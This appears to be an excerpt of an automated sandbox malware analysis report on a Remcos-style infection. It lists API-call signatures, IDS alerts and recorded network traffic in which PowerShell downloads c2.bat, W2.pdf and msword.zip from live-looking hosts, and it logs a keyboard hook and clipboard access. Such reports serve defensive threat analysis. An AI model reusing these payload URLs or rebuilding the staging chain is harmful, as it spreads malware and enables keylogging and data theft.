Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,36_2_0026E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,36_2_0027A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023C622 FindFirstFileExW,36_2_0023C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002766DC FindFirstFileW,FindNextFileW,FindClose,36_2_002766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00277333 FindFirstFileW,FindClose,36_2_00277333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,36_2_002773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00F3E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00F4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F466DC FindFirstFileW,FindNextFileW,FindClose,38_2_00F466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0C622 FindFirstFileExW,38_2_00F0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00F473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F47333 FindFirstFileW,FindClose,38_2_00F47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3DC54
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49822 -> 193.26.115.39:7009
Source: global trafficTCP traffic: 192.168.2.4:49822 -> 193.26.115.39:7009
Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox ViewIP Address: 193.26.115.39 193.26.115.39
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49830 -> 178.237.33.50:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 193.26.115.39:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49737 -> 193.26.115.39:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 193.26.115.39:443
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027D889 InternetReadFile,SetEvent,GetLastError,SetEvent,36_2_0027D889
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: candwfarmsllc.com
Source: global trafficDNS traffic detected: DNS query: myguyapp.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
Source: global trafficDNS traffic detected: DNS query: me-work.com
Source: global trafficDNS traffic detected: DNS query: geoplugin.net
Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000002.00000002.1693219999.0000000004FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://candwfarmsllc.com
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000002.00000002.1690664991.0000000002D56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: msword.exe, 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000000.2027567502.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.13.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081554510.0000000000485000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000000.2103224867.00000000002D5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com, 00000026.00000000.2206840035.0000000000FA5000.00000002.00000001.01000000.00000012.sdmp, LinkHub.com.28.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.13.drString found in binary or memory: http://www.digicert.com/CPS0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
Source: mshta.exe, 00000000.00000003.1701548408.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1702282615.0000000005F12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1704093551.0000000005F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.c
Source: powershell.exe, 00000002.00000002.1693219999.0000000004E55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1693155357.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp, c2.htaString found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1693219999.000000000541F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: cmd.exe, 00000004.00000002.2028777650.000000000348E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2007892523.0000000003472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2008095310.000000000348C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.p
Source: powershell.exe, 00000002.00000002.1693219999.0000000004FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1693219999.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050275526.000000000076E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050211929.0000000000740000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050832433.00000000022D0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068797895.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068708312.0000000003110000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073547689.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077689242.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077398064.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133237800.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133362486.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2094606704.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf9
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfG
Source: tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD
Source: cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdfsD
Source: cmd.exe, 00000004.00000003.1682580513.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msw
Source: cmd.exe, 00000004.00000003.1708975352.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050275526.000000000076E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050211929.0000000000740000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000010.00000002.2050832433.00000000022D0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068797895.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068708312.0000000003110000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073547689.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077689242.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.2077398064.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133237800.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2133362486.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2094606704.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip
Source: cmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipbN
Source: cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipqD
Source: tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipur
Source: Propose.com, 0000001C.00000003.2087736160.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087958038.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087599132.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087186951.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087243889.00000000001A5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094480482.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087370625.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087769877.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2094550176.00000000001A4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2087286049.00000000001A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA
Source: cmd.exe, 00000021.00000002.2095752286.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
Source: tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/mt
Source: powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: LinkHub.com.28.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004050CD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,36_2_0027F7C7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,38_2_00F4F7C7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,36_2_0027F55C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,16_2_004044A5
